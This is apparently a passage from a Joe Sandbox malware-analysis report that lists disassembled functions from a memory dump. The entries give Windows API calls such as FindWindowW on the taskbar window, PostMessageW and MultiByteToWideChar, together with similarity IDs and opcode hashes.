                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                            • Opcode ID: c2020dff14a11365077532462e163d058f742f9c9ff930a7caa389e43913f5e6
                                                                                                                                                                                                                                                                            • Instruction ID: 6c0592cc6c26333cb8da23c4ff84ea2d5389cf73be19b38a244629536d1d6a21
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c2020dff14a11365077532462e163d058f742f9c9ff930a7caa389e43913f5e6
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98D0A9353853007AE228A330AC0BFCA2B109B40B10F6008257606AA0C0C8A068818B48
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00C82DC8
                                                                                                                                                                                                                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00C82DDB
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5F292: Sleep.KERNEL32 ref: 00C5F30A
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FindMessagePostSleepWindow
                                                                                                                                                                                                                                                                            • String ID: Shell_TrayWnd
                                                                                                                                                                                                                                                                            • API String ID: 529655941-2988720461
                                                                                                                                                                                                                                                                            • Opcode ID: 5ccb5d6c489074b6d8c1404c84ddb7dddd3d0776d167a7ef6a5733728a50e465
                                                                                                                                                                                                                                                                            • Instruction ID: f41e1e830cf26d49874e26e37db79c0ae742fcf595399b947f956deee4a949b7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5ccb5d6c489074b6d8c1404c84ddb7dddd3d0776d167a7ef6a5733728a50e465
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0FD02239398300B7E228B330AC0FFDB3B109F40B10F200835770AAA0C0C8E06881CB48
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,?,?,00000000,?,?,?,?,?,00000000,?), ref: 00C2C213
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C2C221
                                                                                                                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C2C27C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ByteCharMultiWide$ErrorLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 1717984340-0
                                                                                                                                                                                                                                                                            • Opcode ID: 16e1554040e7953c18b85a7ce936610f3fd59618d47a190b44fe31bf161e8f1e
                                                                                                                                                                                                                                                                            • Instruction ID: 8901df47e0f1d46326a438052977cc2e76f618554f1509ae84c023098a242181
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 16e1554040e7953c18b85a7ce936610f3fd59618d47a190b44fe31bf161e8f1e
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C4411930600225EFDB218FE5E8C4BBE7BA5EF12720F244169F865975A1DF308E01D760